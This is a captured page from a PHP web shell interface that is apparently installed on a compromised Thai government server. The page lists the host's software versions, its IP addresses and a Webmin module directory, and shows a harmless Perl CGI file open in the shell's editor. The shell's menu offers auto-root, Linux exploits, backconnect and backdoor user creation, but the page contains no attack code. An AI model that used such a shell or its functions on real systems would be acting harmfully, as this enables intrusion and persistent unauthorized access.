Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
libexec /
webmin /
mon /
[ HOME SHELL ]
Name
Size
Permission
Action
help
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
CHANGELOG
113
B
-rw-r--r--
README
287
B
-rw-r--r--
backup_config.pl
732
B
-rwxr-xr-x
config
201
B
-rw-r--r--
config-Fedora-Linux
189
B
-rw-r--r--
config.info
359
B
-rw-r--r--
config.info.ca
390
B
-rw-r--r--
config.info.ca.UTF-8
397
B
-rw-r--r--
config.info.cz
347
B
-rw-r--r--
config.info.cz.UTF-8
375
B
-rw-r--r--
config.info.de
445
B
-rw-r--r--
config.info.de.UTF-8
445
B
-rw-r--r--
config.info.es
415
B
-rw-r--r--
config.info.es.UTF-8
415
B
-rw-r--r--
config.info.nl
420
B
-rw-r--r--
config.info.nl.UTF-8
420
B
-rw-r--r--
config.info.no
389
B
-rw-r--r--
config.info.no.UTF-8
389
B
-rw-r--r--
config.info.ru.UTF-8
506
B
-rw-r--r--
config.info.ru_RU
332
B
-rw-r--r--
config.info.ru_RU.UTF-8
506
B
-rw-r--r--
config.info.ru_SU
332
B
-rw-r--r--
config.info.uk_UA
340
B
-rw-r--r--
config.info.uk_UA.UTF-8
504
B
-rw-r--r--
create_watch.cgi
281
B
-rwxr-xr-x
edit_auth.cgi
1.42
KB
-rwxr-xr-x
edit_global.cgi
2.01
KB
-rwxr-xr-x
edit_service.cgi
8.05
KB
-rwxr-xr-x
edit_user.cgi
1.38
KB
-rwxr-xr-x
edit_watch.cgi
2.21
KB
-rwxr-xr-x
feedback_files.pl
113
B
-rwxr-xr-x
index.cgi
1.52
KB
-rwxr-xr-x
install_check.pl
329
B
-rwxr-xr-x
list_groups.cgi
832
B
-rwxr-xr-x
list_periods.cgi
2.09
KB
-rwxr-xr-x
list_users.cgi
1.03
KB
-rwxr-xr-x
list_watches.cgi
1.26
KB
-rwxr-xr-x
module.info
181
B
-rw-r--r--
module.info.ca
116
B
-rw-r--r--
module.info.ca.UTF-8
129
B
-rw-r--r--
module.info.cz
34
B
-rw-r--r--
module.info.cz.UTF-8
43
B
-rw-r--r--
module.info.de
119
B
-rw-r--r--
module.info.de.UTF-8
131
B
-rw-r--r--
module.info.es
32
B
-rw-r--r--
module.info.es.UTF-8
38
B
-rw-r--r--
module.info.ms_MY
111
B
-rw-r--r--
module.info.ms_MY.UTF-8
123
B
-rw-r--r--
module.info.nl
28
B
-rw-r--r--
module.info.nl.UTF-8
34
B
-rw-r--r--
module.info.no
35
B
-rw-r--r--
module.info.no.UTF-8
41
B
-rw-r--r--
module.info.ru.UTF-8
44
B
-rw-r--r--
module.info.ru_RU
29
B
-rw-r--r--
module.info.ru_RU.UTF-8
47
B
-rw-r--r--
module.info.ru_SU
29
B
-rw-r--r--
mon-lib.pl
8.95
KB
-rwxr-xr-x
mon.cgi
998
B
-rwxr-xr-x
mon_action.cgi
415
B
-rwxr-xr-x
moncmd.diff
2.52
KB
-rw-r--r--
moncmd.pl
5.66
KB
-rwxr-xr-x
monshow.cgi
564
B
-rwxr-xr-x
monshowrc
166
B
-rw-r--r--
restart.cgi
180
B
-rwxr-xr-x
save_auth.cgi
625
B
-rwxr-xr-x
save_global.cgi
1.7
KB
-rwxr-xr-x
save_groups.cgi
656
B
-rwxr-xr-x
save_periods.cgi
1.11
KB
-rwxr-xr-x
save_service.cgi
4.71
KB
-rwxr-xr-x
save_user.cgi
823
B
-rwxr-xr-x
save_watch.cgi
370
B
-rwxr-xr-x
start.cgi
226
B
-rwxr-xr-x
stop.cgi
420
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : list_watches.cgi
#!/usr/bin/perl # list_watches.cgi require './mon-lib.pl'; &ui_print_header(undef, $text{'watches_title'}, ""); $conf = &get_mon_config(); @watches = &find("watch", $conf); if (@watches) { print "<table border width=100%>\n"; print "<tr $tb> <td><b>$text{'watches_group'}</b></td> ", "<td><b>$text{'watches_services'}</b></td> </tr>\n"; foreach $w (@watches) { print "<tr $cb>\n"; print "<td><a href='edit_watch.cgi?idx=$w->{'index'}'>", "$w->{'values'}->[0]</a></td> <td>\n"; local @servs = &find("service", $w->{'members'}); foreach $s (@servs) { local $i = &find_value("interval", $s->{'members'}); print "<a href='edit_service.cgi?idx=$w->{'index'}&", "sidx=$s->{'index'}'>$s->{'values'}->[0] ($i)", "</a> | \n"; } print "<a href='edit_service.cgi?idx=$w->{'index'}&new=1'>", "$text{'watches_sadd'}</a></td>\n"; print "</tr>\n"; } print "</table>\n"; } else { print "<b>$text{'watches_none'}</b><p>\n"; } print "<form action=create_watch.cgi>\n"; print "<input type=submit value='$text{'watches_add'}'>\n"; print "<select name=group>\n"; foreach $s (&find("hostgroup", $conf)) { print "<option>$s->{'values'}->[0]</option>\n"; } print "</select></form>\n"; &ui_print_footer("", $text{'index_return'});
Close